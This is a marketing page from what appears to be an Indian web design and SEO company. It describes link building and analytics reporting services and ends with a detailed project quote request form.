    All links are quality controlled to ensure they meet our strict link building criteria. A full report detailing your link campaign will be sent to you on a monthly basis. Our links are manually obtained, one at a time by a professional link builder, not a computer program. We ensure that all links meet the required criteria and that only links from well regarded websites are procured. We do not engage in questionable practices such as link rings or spamming. Quality link building is resource intensive, but it is the only really effective way of obtaining great links without risk of penalty. Click Here for More Info on Link Building Services.
  • Reporting and monitoring -
    One of the key benefits of SEO over other traditional marketing vehicles is the highly measurable results. As a Smart Traffic client we install Google Analytics free of charge which allows you to monitor traffic levels, sources of traffic, keywords used, pages visited, and many other features which provides the information to constantly drive your SEO campaign forward.
    Furthermore, you will receive ranking reports twice a month showing you your progress up the Google rankings for your keywords, plus monthly link building reports showing the confirmed linking partners so you know exactly what work we have completed each month.

Request a quote

It's POSSIBLE!

Possible Solutions Pvt. Ltd.
526, Dwarkanagari, Cherpoli,
Post. Aaware,
Taluka. Shahapur.
Dist. Thane, Maharashtra
India - 421601
Phone: 0091 - 9890103122


Your Name*
Company Name
Web Site URL
Address (City/State/Country)
Phone*
Email Address*
How do you know us?


General Project Information:
Overall project Description*
Project type For new website
need to upgrade current system
needs maintainance
Other Internet related work
Software Development
If your site needs upgrading what is your present URL address
Project start date
Deadline
Project Budget Amount
Project Scope (check all that apply) Websites- brochure type
Websites- database / ecommerce
Database Driven Site
Flash for websites
HTML email newsletters
Banner ads / button ads
Internet marketing
Search Engine Optimization (seo)
Open source cutomization
Web templates and themes
Logos / business cards / letterheads
Brochures / flyers
Packaging / Box Shots
3d modeling
Book / video / album / cd covers
Flash / cd-rom presentations
Multimedia animation (non-web)
Video presentations
Billboards / poster displays


Information about your current website or system.
Current hosting platform Windows     Unix     Linux     Other     None
Current database mySQL     PostGRE     Oracle     Not Sure     None
Current markup/scripting language PHP     ASP     RUBY     HTML     XML     WML

Not Sure     None


Services Required.
Do you need Flash work? Yes     no
Do you need Content Management System? Yes     No
Do you need web hosting? Yes     No
Do you need databases? Yes     No
Do graphic image material need to be created *? Yes     No
Describe Imaging/Scanning needs if any
Number of html pages needed


Enter up to 3 web site addresses which you feel are representative or similiar to the site you would like for your business.
sample url 1
sample url 2
sample url 3


Image Verification:
Enter six digit code displayed here in the textbox next.    Enter the six character code in the image.